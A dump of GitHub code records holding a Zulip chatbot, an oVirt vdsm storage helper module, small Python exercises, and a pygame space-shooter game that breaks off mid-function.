key == \"job\":\n\t\t\tmessage += \"`ibot job ` - To get a list of jobs available nearby.\\n\"\n\t\telif key == \"direction\":\n\t\t\tmessage += \"`ibot direction from to ` - To get directions from one place to another.\\n\"\n\t\telif key == \"language\":\n\t\t\tmessage += \"`ibot language to ` - To translate your English sentences to other languages.\\n\"\n\t\telse:\n\t\t\tmessage = self.help()\n\t\t\tmessage += \"\\n{} is not a valid subfield\\n\".format(key)\n\t\treturn message\t\t\n\n\tdef process(self, msg):\n\t\tcontent = msg[\"content\"].split()\n\t\tsender_email = msg[\"sender_email\"]\n\t\tttype = msg[\"type\"]\n\t\tstream_name = msg['display_recipient']\n\t\tstream_topic = msg['subject']\n\n\t\tprint(content)\n\t\tl = len(content)\n#\t\ttemstr = spell(content[1].lower())\n#\t\tcontent[1] = temstr\n#\t\tprint(content[1])\n\t\tif sender_email == BOT_MAIL:\n\t\t\treturn \n\n\t\tprint(\"doing\")\n\n\t\tif content[0].lower() == \"ibot\" or content[0] == \"@**IBOT**\":\n\t\t\tif content[1].lower() == \"currency\":\n\t\t\t\tmessage = self.currency.curfun(content)\n\t\t\t\t#print(message)\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\" : msg[\"subject\"],\n\t\t\t\t\t\"to\" : msg[\"display_recipient\"],\n\t\t\t\t\t\"content\" : message\n\t\t\t\t\t})\n\t\t\tif content[1].lower() == \"latilongi\":\n\t\t\t\tmessage = self.lat_lon.latlonfun(content)\n\t\t\t\t#print(message)\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\" : msg[\"subject\"],\n\t\t\t\t\t\"to\" : msg[\"display_recipient\"],\n\t\t\t\t\t\"content\" : message\n\t\t\t\t\t})\n\t\t\tif content[1].lower() == \"language\":\n\t\t\t\tmessage = self.language.langconvert(content)\n\t\t\t\t#print(message)\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\" : msg[\"subject\"],\n\t\t\t\t\t\"to\" : msg[\"display_recipient\"],\n\t\t\t\t\t\"content\" : message\n\t\t\t\t\t})\n\t\t\tif content[1].lower() == \"restaurant\":\n\t\t\t\tmessage = self.restaurants.restfun(content)\n\t\t\t\t#print(message)\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\" : msg[\"subject\"],\n\t\t\t\t\t\"to\" : msg[\"display_recipient\"],\n\t\t\t\t\t\"content\" : message\n\t\t\t\t\t})\n\t\t\tif content[1].lower() == \"bus\":\n\t\t\t\tmessage = self.bus_stations.busfun(content)\n\t\t\t\t#print(message)\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\" : msg[\"subject\"],\n\t\t\t\t\t\"to\" : msg[\"display_recipient\"],\n\t\t\t\t\t\"content\" : message\n\t\t\t\t\t})\n\t\t\tif content[1].lower() == \"tourist\":\n\t\t\t\tmessage = self.tourist_places.tourfun(content)\n\t\t\t\t#print(message)\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\" : msg[\"subject\"],\n\t\t\t\t\t\"to\" : msg[\"display_recipient\"],\n\t\t\t\t\t\"content\" : message\n\t\t\t\t\t})\n\t\t\tif content[1].lower() == \"job\":\n\t\t\t\tmessage = self.jobs.jobfun(content)\n\t\t\t\t#print(message)\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\" : msg[\"subject\"],\n\t\t\t\t\t\"to\" : msg[\"display_recipient\"],\n\t\t\t\t\t\"content\" : message\n\t\t\t\t\t})\n\t\t\tif content[1].lower() == \"atm\":\n\t\t\t\tmessage = self.atm.atmfun(content)\n\t\t\t\t#print(message)\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\" : msg[\"subject\"],\n\t\t\t\t\t\"to\" : msg[\"display_recipient\"],\n\t\t\t\t\t\"content\" : message\n\t\t\t\t\t})\n\t\t\tif content[1].lower() == \"direction\":\n\t\t\t\tmessage = self.directions.directfun(content)\n\t\t\t\t#print(message)\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\" : msg[\"subject\"],\n\t\t\t\t\t\"to\" : msg[\"display_recipient\"],\n\t\t\t\t\t\"content\" : message\n\t\t\t\t\t})\n\t\t\tif content[1].lower() == \"help\" and len(content) == 2:\n\t\t\t\tmessage = self.help()\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\": msg[\"subject\"],\n\t\t\t\t\t\"to\": msg[\"display_recipient\"],\n\t\t\t\t\t\"content\": message \n\t\t\t\t\t})\n\t\t\tif content[1].lower() == \"help\" and len(content) > 2:\n\t\t\t\tsubkey = content[2]\n\t\t\t\tmessage = self.help_sub(subkey)\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\": msg[\"subject\"],\n\t\t\t\t\t\"to\": msg[\"display_recipient\"],\n\t\t\t\t\t\"content\": message \n\t\t\t\t\t})\n \n\t\t\tif content[1] not in self.subkeys:\n\t\t\t\tip = content[1:]\n\t\t\t\tip = \" \".join(ip)\n\t\t\t\tmessage = self.chatbot.get_response(ip).text\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\": msg[\"subject\"],\n\t\t\t\t\t\"to\": msg[\"display_recipient\"],\n\t\t\t\t\t\"content\": message\n\t\t\t\t\t})\n \n\t\tif self.urls(\" \".join(content)):\n\t\t\tsummary = self.w.wiki(\" \".join(content))\n\t\t\tif summary:\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\": msg[\"subject\"],\n\t\t\t\t\t\"to\": msg[\"display_recipient\"],\n\t\t\t\t\t\"content\": summary\n\t\t\t\t\t})\n\t\telif \"ibot\" in content and content[0] != \"ibot\":\n\t\t\tself.client.send_message({\n\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\"subject\": msg[\"subject\"],\n\t\t\t\t\"to\": msg[\"display_recipient\"],\n\t\t\t\t\"content\": \"Alas! Finally you called me :blush:\"\n\t\t\t\t})\n\t\telse:\n\t\t\treturn\n\ndef main():\n\tbot = ZulipBot()\n\tbot.client.call_on_each_message(bot.process)\n\nif __name__ == \"__main__\":\n\ttry:\n\t\tmain()\n\texcept KeyboardInterrupt:\n\t\tprint(\"Thanks for using IBOT. Bye!\")\n\t\tsys.exit(0)\n\n","repo_name":"prankuragarwal/Red_Hot_Techie_Pepper","sub_path":"ibot/mainbot.py","file_name":"mainbot.py","file_ext":"py","file_size_in_byte":8767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"70573934087","text":"from __future__ import absolute_import\n\nimport errno\nimport grp\nimport logging\nimport os\nimport stat\nimport threading\nimport types\nimport weakref\n\nfrom functools import partial\nimport six\n\nimport ioprocess\n\nfrom vdsm import constants\nfrom vdsm import utils\nfrom vdsm.common.osutils import get_umask\nfrom vdsm.config import config\nfrom vdsm.storage import constants as sc\nfrom vdsm.storage import exception as se\n\nDEFAULT_TIMEOUT = config.getint(\"irs\", \"process_pool_timeout\")\nIOPROC_IDLE_TIME = config.getint(\"irs\", \"max_ioprocess_idle_time\")\nHELPERS_PER_DOMAIN = config.getint(\"irs\", \"process_pool_max_slots_per_domain\")\nMAX_QUEUED = config.getint(\"irs\", \"process_pool_max_queued_slots_per_domain\")\n\n_procPoolLock = threading.Lock()\n_procPool = {}\n_refProcPool = {}\n\nelapsed_time = lambda: os.times()[4]\n\nlog = logging.getLogger('storage.oop')\n\n\ndef stop():\n \"\"\"\n Called during application shutdown to close all running ioprocesses.\n\n Tests using oop should call this to ensure that stale ioprocess are not\n left when a tests ends.\n \"\"\"\n with _procPoolLock:\n for name, (eol, proc) in _procPool.items():\n log.debug(\"Closing ioprocess %s\", name)\n try:\n proc._ioproc.close()\n except Exception:\n log.exception(\"Error closing ioprocess %s\", name)\n _procPool.clear()\n _refProcPool.clear()\n\n\ndef cleanIdleIOProcesses(clientName):\n now = elapsed_time()\n for name, (eol, proc) in list(six.iteritems(_procPool)):\n if (eol < now and name != clientName):\n log.debug(\"Removing idle ioprocess %s\", name)\n del _procPool[name]\n\n\ndef getProcessPool(clientName):\n with _procPoolLock:\n cleanIdleIOProcesses(clientName)\n\n proc = _refProcPool.get(clientName, lambda: None)()\n if proc is None:\n log.debug(\"Creating ioprocess %s\", clientName)\n proc = ioprocess.IOProcess(max_threads=HELPERS_PER_DOMAIN,\n timeout=DEFAULT_TIMEOUT,\n max_queued_requests=MAX_QUEUED,\n name=clientName)\n proc = _IOProcWrapper(\"oop\", proc)\n _refProcPool[clientName] = weakref.ref(proc)\n\n _procPool[clientName] = (elapsed_time() + IOPROC_IDLE_TIME, proc)\n return proc\n\n\nclass _IOProcessGlob(object):\n def __init__(self, iop):\n self._iop = iop\n\n def glob(self, pattern):\n return self._iop.glob(pattern)\n\n\nclass _IOProcessFileUtils(object):\n def __init__(self, iop):\n self._iop = iop\n\n def fsyncPath(self, path):\n self._iop.fsyncPath(path)\n\n def cleanupdir(self, path, ignoreErrors=True):\n cleanupdir_errors = []\n\n try:\n files = self._iop.listdir(path)\n except OSError:\n if not ignoreErrors:\n raise\n else:\n for f in files:\n fullpath = os.path.join(path, f)\n if _IOProcessOs(self._iop).path.isdir(fullpath):\n try:\n self.cleanupdir(fullpath, ignoreErrors)\n except OSError as e:\n cleanupdir_errors.append(e)\n else:\n try:\n self._iop.unlink(fullpath)\n except Exception as e:\n cleanupdir_errors.append('%s: %s' % (\"unlink\", e))\n try:\n self._iop.rmdir(path)\n except Exception as e:\n cleanupdir_errors.append('%s: %s' % (\"rmdir\", e))\n\n if not ignoreErrors and cleanupdir_errors:\n raise se.MiscDirCleanupFailure(\"%s %s\" % (path, cleanupdir_errors))\n\n def copyUserModeToGroup(self, path):\n mode = _IOProcessOs(self._iop).stat(path).st_mode\n userMode = mode & 0o700 # user mode mask\n newGroupMode = userMode >> 3\n if (mode & 0o070) != newGroupMode: # group mode mask\n # setting the new group mode masking out the original one\n newMode = (mode & 0o707) | newGroupMode\n log.debug(\"Changing mode for %s to %#o\", path, newMode)\n _IOProcessOs(self._iop).chmod(path, newMode)\n\n def createdir(self, path, mode=None):\n parts = path.split(\"/\")\n tmpPath = \"\"\n for part in parts:\n tmpPath = os.path.join(tmpPath, part)\n if tmpPath == \"\":\n tmpPath = \"/\"\n\n try:\n if mode:\n self._iop.mkdir(tmpPath, mode)\n else:\n self._iop.mkdir(tmpPath)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n statinfo = self._iop.stat(tmpPath)\n if not stat.S_ISDIR(statinfo.st_mode):\n raise OSError(errno.ENOTDIR,\n \"Not a directory %s\" % tmpPath)\n if tmpPath == path and mode is not None:\n actual_mode = stat.S_IMODE(statinfo.st_mode)\n expected_mode = mode & ~get_umask()\n if actual_mode != expected_mode:\n raise OSError(\n errno.EPERM,\n \"Existing {} permissions {:o} are not as requested\"\n \" {:o}\".format(path, actual_mode, expected_mode))\n\n def padToBlockSize(self, path):\n size = _IOProcessOs(self._iop).stat(path).st_size\n newSize = utils.round(size, sc.BLOCK_SIZE_4K)\n log.debug(\"Truncating file %s to %d bytes\", path, newSize)\n truncateFile(self._iop, path, newSize)\n\n def validateAccess(self, targetPath, perms=(os.R_OK | os.W_OK | os.X_OK)):\n if not self._iop.access(targetPath, perms):\n log.warning(\"Permission denied for directory: %s with permissions:\"\n \"%s\", targetPath, perms)\n raise OSError(errno.EACCES, os.strerror(errno.EACCES))\n\n def pathExists(self, filename, writable=False):\n return self._iop.pathExists(filename, writable)\n\n def validateQemuReadable(self, targetPath):\n \"\"\"\n Validate that qemu process can read file\n \"\"\"\n gids = (grp.getgrnam(constants.DISKIMAGE_GROUP).gr_gid,\n grp.getgrnam(constants.METADATA_GROUP).gr_gid)\n st = _IOProcessOs(self._iop).stat(targetPath)\n if not (st.st_gid in gids and st.st_mode & stat.S_IRGRP or\n st.st_mode & stat.S_IROTH):\n raise OSError(errno.EACCES, os.strerror(errno.EACCES))\n\n\nclass _IOProcessOs(object):\n def __init__(self, iop):\n self._iop = iop\n self.path = _IOProcessOs.Path(iop)\n\n def access(self, path, perms):\n return self._iop.access(path, perms)\n\n def chmod(self, path, mode):\n self._iop.chmod(path, mode)\n\n def link(self, src, dst):\n self._iop.link(src, dst)\n\n def mkdir(self, path, mode=None):\n if mode is not None:\n self._iop.mkdir(path, mode)\n else:\n self._iop.mkdir(path)\n\n def remove(self, path):\n self._iop.unlink(path)\n\n def rename(self, oldpath, newpath):\n self._iop.rename(oldpath, newpath)\n\n def rmdir(self, path):\n self._iop.rmdir(path)\n\n def stat(self, path):\n return self._iop.stat(path)\n\n def statvfs(self, path):\n return self._iop.statvfs(path)\n\n def unlink(self, path):\n return self._iop.unlink(path)\n\n class Path(object):\n def __init__(self, iop):\n self._iop = iop\n\n def isdir(self, path):\n try:\n res = self._iop.stat(path)\n except OSError as e:\n if e.errno == errno.ENOENT:\n return False\n else:\n raise\n else:\n return stat.S_ISDIR(res.st_mode)\n\n def islink(self, path):\n # Note: islink does not follow symlinks. This is not documented\n # explicitly, but it does not make sense otherwise.\n try:\n res = self._iop.lstat(path)\n except OSError as e:\n if e.errno == errno.ENOENT:\n return False\n else:\n raise\n else:\n return stat.S_ISLNK(res.st_mode)\n\n def lexists(self, path):\n return self._iop.lexists(path)\n\n def exists(self, path):\n return self._iop.pathExists(path, False)\n\n\nclass _IOProcessUtils(object):\n def __init__(self, iop):\n self._iop = iop\n\n def forceLink(self, src, dst):\n \"\"\" Makes or replaces a hard link.\n\n Like os.link() but replaces the link if it exists.\n \"\"\"\n try:\n _IOProcessOs(self._iop).link(src, dst)\n except OSError as e:\n if e.errno == errno.EEXIST:\n self.rmFile(dst)\n _IOProcessOs(self._iop).link(src, dst)\n else:\n log.error(\"Linking file: %s to %s failed\", src, dst,\n exc_info=True)\n raise\n\n def rmFile(self, path):\n \"\"\"\n Try to remove a file.\n\n If the file doesn't exist it's assumed that it was already removed.\n \"\"\"\n try:\n _IOProcessOs(self._iop).unlink(path)\n except OSError as e:\n if e.errno == errno.ENOENT:\n log.warning(\"File: %s already removed\", path)\n else:\n log.error(\"Removing file: %s failed\", path, exc_info=True)\n raise\n\n\ndef readLines(ioproc, path):\n return ioproc.readlines(path)\n\n\ndef writeLines(ioproc, path, lines):\n data = b''.join(lines)\n return writeFile(ioproc, path, data)\n\n\ndef writeFile(ioproc, path, data, direct=False):\n return ioproc.writefile(path, data, direct=direct)\n\n\ndef simpleWalk(ioproc, path):\n files = []\n for f in ioproc.listdir(path):\n fullpath = os.path.join(path, f)\n osPath = _IOProcessOs(ioproc).path\n if osPath.isdir(fullpath) and not osPath.islink(fullpath):\n files.extend(simpleWalk(ioproc, fullpath))\n else:\n files.append(fullpath)\n\n return files\n\n\ndef truncateFile(ioproc, path, size, mode=None, creatExcl=False):\n ioproc.truncate(path, size, mode if mode is not None else 0, creatExcl)\n if mode is not None:\n _IOProcessOs(ioproc).chmod(path, mode)\n\n\nclass _IOProcWrapper(types.ModuleType):\n def __init__(self, modname, ioproc):\n self._modName = modname\n self._ioproc = ioproc\n\n self.glob = _IOProcessGlob(ioproc)\n self.fileUtils = _IOProcessFileUtils(ioproc)\n self.os = _IOProcessOs(ioproc)\n self.utils = _IOProcessUtils(ioproc)\n\n self.readLines = partial(readLines, ioproc)\n self.writeLines = partial(writeLines, ioproc)\n self.writeFile = partial(writeFile, ioproc)\n self.simpleWalk = partial(simpleWalk, ioproc)\n self.truncateFile = partial(truncateFile, ioproc)\n\n def readFile(self, path, direct=False):\n return self._ioproc.readfile(path, direct=direct)\n\n def probe_block_size(self, dir_path):\n return self._ioproc.probe_block_size(dir_path)\n","repo_name":"oVirt/vdsm","sub_path":"lib/vdsm/storage/outOfProcess.py","file_name":"outOfProcess.py","file_ext":"py","file_size_in_byte":11236,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"16"} +{"seq_id":"6150528986","text":"#!/usr/bin/env python3\nimport sys\nf = open( sys.argv[1] )\n\ncount = 0\nmapq_sum= 0\nfor i, line in enumerate( f ):\n if line.startswith(\"@\"):\n continue\n fields = line.rstrip(\"\\r\\n\").split(\"\\t\")\n mapq = int(fields[4])\n count +=1\n mapq_sum += mapq\n average = mapq_sum/count\n #flag = fields[1]\nprint(average)","repo_name":"rpaisner/qbb2018-answers","sub_path":"day2-lunch/exercise5.py","file_name":"exercise5.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"29448939189","text":"fruits = ['apple', 'orange', 'peach']\nprices = [12, 10, 23]\nchange = [1, 'cat', 2, 'parrot', 3, 'giraffe']\n\nfor fruit in fruits:\n\tprint(f'Fruit is {fruit}')\n\nfor i in prices:\n\tprint(f\"Price is {i}\")\n\nprint(f\"Let's count to ten!\")\nfor i in range(1,11):\n\tprint(f\"{i}\")\n\nelements = []\n\nfor i in change:\n\tif i in range(0,4):\n\t\telements.append(i)\n\t\tprint(f\"{i} is added\")\n\telse:\n\t\tprint(f\"{i} is not a number\")\n\nprint(elements)\nelements.extend(prices)\nprint(f\"elements are {elements}\")\nelements.insert(1, 666)\nelements.append(666)\nprint(f\"inserted 666 as second and last items.\\n{elements}\")\nprint(f\"let's count 666s - there are {elements.count(666)} of them. (should be 2)\")\nelements.clear()\n","repo_name":"ooddaa/thehardway","sub_path":"ex32.py","file_name":"ex32.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71682739849","text":"# single level inheritance with constructor\nclass Parent:\n haircolor=\"Black\"\n def __init__(self,name,height,bloodgroup,weight):\n self.fullname=name\n self.height=height\n self.blood=bloodgroup\n self.weight=weight\n print(\"Parent constructor is ran\")\n\n def ParentDetails(self):\n print(f\"\\nName is {self.fullname}\\nHeight is {self.height}\\nBlood group is {self.blood}\\nWeight is {self.weight}\\nHair Color is {self.haircolor}\")\n\nclass Child(Parent):\n \n def __init__(self,name,height,bloodgroup,weight,age):\n self.fullname=name\n self.height=height\n self.blood=bloodgroup\n self.weight=weight\n self.age=age\n print(\"Child constructor is ran\")\n\n def ChildDetails(self):\n print(f\"\\nName is {self.fullname}\\nHeight is {self.height}\\nBlood group is {self.blood}\\nWeight is {self.weight}\\nHair Color is {self.haircolor}\\nAge is {self.age}\")\n\n\nc1=Child(\"ark\",\"6.0\",\"B+\",98)\nc1.ChildDetails()\nc1.ParentDetails()\n\np1=Parent(\"z\",3,\"o\",87)\np1.ParentDetails()","repo_name":"arkprocoder/daimond","sub_path":"python/python-oops/opps6.py","file_name":"opps6.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74901847048","text":"# Autor: Carlos Martínez\n\n# Librerías\nimport pygame\nimport random\nimport os\n\n# Configuración general del juego (tamaño de pantalla y velocidad)\nWIDTH = 800\nHEIGHT = 600\nFPS = 30\n\n# Paleta de colores\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (235, 47, 6)\nBLUE = (0, 168, 255)\nORANGE = (229, 142, 38)\n\n# Declarar la ubicación del folder donde se encuentra el juego para que funciones en cualquier\n# sistema operativo\ngameFolder = os.path.dirname(__file__)\nassetsFolder = os.path.join(gameFolder, \"img\")\nmusicFolder = os.path.join(gameFolder, \"music\")\n\n\n# Preguntar nombre al usuario para guardar High Score\ndef preguntarNombre():\n nombre = input(\n \"Listo para jugar?\\nAntes de comenzar, por favor escribe tu nombre.\\nSe utilizará para guardar tu puntuación: \")\n return nombre\n\n\n# Función para dibujar texto en la ventana del juego\nfontName = pygame.font.match_font('arial')\n\n\ndef typeText(surface, text, size, x, y):\n font = pygame.font.Font(fontName, size)\n textSurface = font.render(text, True, WHITE)\n textRect = textSurface.get_rect()\n textRect.midtop = (x, y)\n surface.blit(textSurface, textRect)\n\n\ndef nuevoMeteorito():\n mob = Mob()\n allSprites.add(mob)\n mobs.add(mob)\n\n\ndef dibujarBarraEscudo(ventana, x, y, porcentage):\n if porcentage < 0:\n porcentage = 0\n bLength = 100\n bHeight = 10\n border = pygame.Rect(x, y, bLength, bHeight)\n fillRect = pygame.Rect(x, y, porcentage, bHeight)\n pygame.draw.rect(ventana, BLUE, fillRect)\n pygame.draw.rect(ventana, WHITE, border, 2)\n ventana.blit(shieldImg, (10, 8))\n\n\ndef inicioJuego():\n ventana.blit(bg, bgRect)\n typeText(ventana, \"Space Shooter\", 72, WIDTH / 2, HEIGHT / 4)\n ventana.blit(btnJugar.image, btnJugar.rect)\n ventana.blit(btnHowToPlay.image, btnHowToPlay.rect)\n ventana.blit(btnHighScore.image, btnHighScore.rect)\n pygame.display.flip()\n menu = True\n while menu:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.KEYUP:\n menu = False\n\n\ndef highScores():\n ventana.blit(bg, bgRect)\n typeText(ventana, \"High Scores\", 54, WIDTH / 2, HEIGHT / 5)\n pygame.display.flip()\n gameOver = True\n while gameOver:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.KEYUP:\n gameOver = False\n\ndef gameOver(score):\n ventana.blit(bg, bgRect)\n typeText(ventana, \"Game Over\", 72, WIDTH / 2, HEIGHT / 4)\n typeText(ventana, \"Score: \" + str(score), 36, WIDTH / 2, HEIGHT / 2)\n typeText(ventana, \"Presiona cualquier tecla para volver a jugar!\", 20, WIDTH / 2, HEIGHT - 100)\n\n while gameOver:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.KEYUP:\n gameOver = False\n\n\ndef mostrarVidas(ventana, x, y, vidas, img):\n for vida in range(vidas):\n imgRect = img.get_rect()\n imgRect.x = x + (imgRect.width + 5) * vida\n imgRect.y = y\n ventana.blit(img, imgRect)\n\n\n# Sprites\nclass Player(pygame.sprite.Sprite):\n # Sprite for the player\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.transform.scale(naveImg, (50, 38))\n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.radius = 20\n self.rect.centerx = WIDTH / 2\n self.rect.bottom = HEIGHT - 10\n self.speedX = 0\n self.speed = 15\n self.shield = 100\n self.vidas = 3\n self.display = False\n self.displayTimer = pygame.time.get_ticks()\n\n def update(self):\n # Mostrar nave\n if self.display and pygame.time.get_ticks() - self.displayTimer > 1000:\n self.display = False\n self.rect.centerx = WIDTH / 2\n self.rect.bottom = HEIGHT - 10\n self.speedX = 0\n keystate = pygame.key.get_pressed()\n # Movimiento del Sprite si se precionan las teclas izquierda o derecha(<-- o -->)\n if keystate[pygame.K_LEFT] or keystate[pygame.K_a]:\n self.speedX = -self.speed\n if keystate[pygame.K_RIGHT]:\n self.speedX = self.speed\n self.rect.x += self.speedX\n # Límites del Sprite respecto a los bordes de la pantalla\n if self.rect.right > WIDTH:\n self.rect.right = WIDTH\n if self.rect.left < 0:\n self.rect.left = 0\n\n def shoot(self):\n bullet = Bullet(self.rect.centerx, self.rect.top)\n allSprites.add(bullet)\n bullets.add(bullet)\n shootSound.play()\n\n def ocultar(self):\n self.display = True\n self.displayTimer = pygame.time.get_ticks()\n self.rect.center = (WIDTH / 2, HEIGHT + 200)\n\n\nclass Mob(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.imageOriginal = random.choice(meteorImages)\n self.imageOriginal.set_colorkey(BLACK)\n self.image = self.imageOriginal.copy()\n self.rect = self.image.get_rect()\n self.radius = int(self.rect.width / 2)\n self.rect.x = random.randrange(WIDTH - self.rect.width)\n self.rect.y = random.randrange(-150, -100)\n self.speedY = random.randrange(5, 15)\n self.speedX = random.randrange(-3, 3)\n\n def update(self):\n self.rect.x += self.speedX\n self.rect.y += self.speedY\n if self.rect.top > HEIGHT + 10 or self.rect.left < -30 or self.rect.right > WIDTH + 30:\n self.rect.x = random.randrange(WIDTH - self.rect.width)\n self.rect.y = random.randrange(-150, -100)\n self.speedY = random.randrange(5, 15)\n\n\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, x, y):\n pygame.sprite.Sprite.__init__(self)\n self.image = bulletImg\n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.rect.bottom = y\n self.rect.centerx = x\n self.speed = -10\n\n def update(self):\n self.rect.y += self.speed\n # Eliminar el sprite si se sale de la pantalla\n if self.rect.bottom < 0:\n self.kill()\n\n\nclass Explosion(pygame.sprite.Sprite):\n def __init__(self, center, size):\n pygame.sprite.Sprite.__init__(self)\n self.size = size\n self.image = explosionAnimation[self.size][0]\n self.rect = self.image.get_rect()\n self.rect.center = center\n self.frame = 0\n self.lastUpdate = pygame.time.get_ticks()\n self.frameCount = 50\n\n def update(self):\n now = pygame.time.get_ticks()\n if now - self.lastUpdate > self.frameCount:\n self.lastUpdate = now\n self.frame += 1\n if self.frame == len(explosionAnimation[self.size]):\n self.kill()\n else:\n center = self.rect.center\n self.image = explosionAnimation[self.size][self.frame]\n self.rect = self.image.get_rect()\n self.rect.center = center\n\n\n# Botones\nimgBotonJugar = pygame.image.load(os.path.join(assetsFolder, \"start.png\"))\nimgBotonHowToPlay = pygame.image.load(os.path.join(assetsFolder, \"howToPlay.png\"))\nimgBotonHighScore = pygame.image.load(os.path.join(assetsFolder, \"highScore.png\"))\n\nbtnJugar = pygame.sprite.Sprite() # SPRITE\nbtnJugar.image = imgBotonJugar\nbtnJugar.rect = imgBotonJugar.get_rect()\nbtnJugar.rect.left = WIDTH / 2 - btnJugar.rect.width / 2 # coordenada x\nbtnJugar.rect.top = HEIGHT / 2 - btnJugar.rect.height / 2 # coordenada y\n\nbtnHighScore = pygame.sprite.Sprite()\nbtnHighScore.image = imgBotonHighScore\nbtnHighScore.rect = imgBotonHighScore.get_rect()\nbtnJugar.rect.left = WIDTH / 2 - btnJugar.rect.width / 2 # coordenada x\nbtnJugar.rect.top = HEIGHT / 2 - btnJugar.rect.height / 2 + 5# coordenada y\n\nbtnHowToPlay = pygame.sprite.Sprite()\nbtnHowToPlay.image = imgBotonHowToPlay\nbtnHowToPlay.rect = imgBotonHowToPlay.get_rect()\nbtnJugar.rect.left = WIDTH / 2 - btnJugar.rect.width / 2 # coordenada x\nbtnJugar.rect.top = HEIGHT / 2 - btnJugar.rect.height / 2 + 10 # coordenada y\n\n# Iniciar Pygame y crear la ventana del juego\npygame.init()\npygame.mixer.init()\nventana = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"Game\")\nclock = pygame.time.Clock()\n\n# Cargar gráficos del juego\nbg = pygame.image.load(os.path.join(assetsFolder, \"corona_rt.png\")).convert()\nbgRect = bg.get_rect()\nnaveImg = pygame.image.load(os.path.join(assetsFolder, \"playerShip1_red.png\")).convert()\nnaveVidaImg = pygame.image.load(os.path.join(assetsFolder, \"playerLife1_red.png\")).convert()\nnaveVidaImg.set_colorkey(BLACK)\nmeteorImages = []\nmeteorList = ['meteorBrown_big1.png', 'meteorBrown_big2.png', 'meteorBrown_big3.png', 'meteorBrown_big4.png',\n 'meteorBrown_med1.png', 'meteorBrown_med3.png', 'meteorBrown_small1.png', 'meteorBrown_small2.png',\n 'meteorBrown_tiny1.png', 'meteorBrown_tiny2.png']\nfor img in meteorList:\n meteorImages.append(pygame.image.load(os.path.join(assetsFolder, img)))\nbulletImg = pygame.image.load(os.path.join(assetsFolder, \"laserBlue16.png\")).convert()\n# En el siguiente diccionario se van a agregar dos tamaños de explociones para llamarlas individualmente\n# según el tamaño que corresponde al Sprite\nexplosionAnimation = {}\nexplosionAnimation['lg'] = []\nexplosionAnimation['sm'] = []\nfor f in range(9):\n filename = 'regularExplosion0{}.png'.format(f)\n img = pygame.image.load(os.path.join(assetsFolder, filename)).convert()\n img.set_colorkey(BLACK)\n imgLarge = pygame.transform.scale(img, (80, 80))\n explosionAnimation['lg'].append(imgLarge)\n imgSmall = pygame.transform.scale(img, (32, 32))\n explosionAnimation['sm'].append(imgSmall)\nshieldImg = pygame.image.load(os.path.join(assetsFolder, \"shield.png\"))\n\n# Cargar sonidos del juego\nshootSound = pygame.mixer.Sound(os.path.join(musicFolder, \"laser1.wav\"))\nexplotionSounds = [pygame.mixer.Sound(os.path.join(musicFolder, \"explosion1.wav\")),\n pygame.mixer.Sound(os.path.join(musicFolder, \"explosion2.wav\"))]\n\nnaveDestruidaSound = pygame.mixer.Sound(os.path.join(musicFolder, \"playerDead.wav\"))\n# Musica de fondo\npygame.mixer.music.load(os.path.join(musicFolder, \"Notathing2.mp3\"))\npygame.mixer.music.set_volume(0.4)\n# Tocar música de fondo\npygame.mixer.music.play(loops=-1)\n# Agrupar Sprites para agregarlos facilmente al juego\nallSprites = pygame.sprite.Group()\n# Mobs group\nmobs = pygame.sprite.Group()\n# Bullets Gorup\nbullets = pygame.sprite.Group()\nplayer = Player()\nallSprites.add(player)\nfor i in range(8):\n nuevoMeteorito()\n# Puntos acumulados del juego\nscore = 0\n\n\ndef dibujar(score):\n # Loop del Juego\n menu = True\n running = True\n while running:\n if 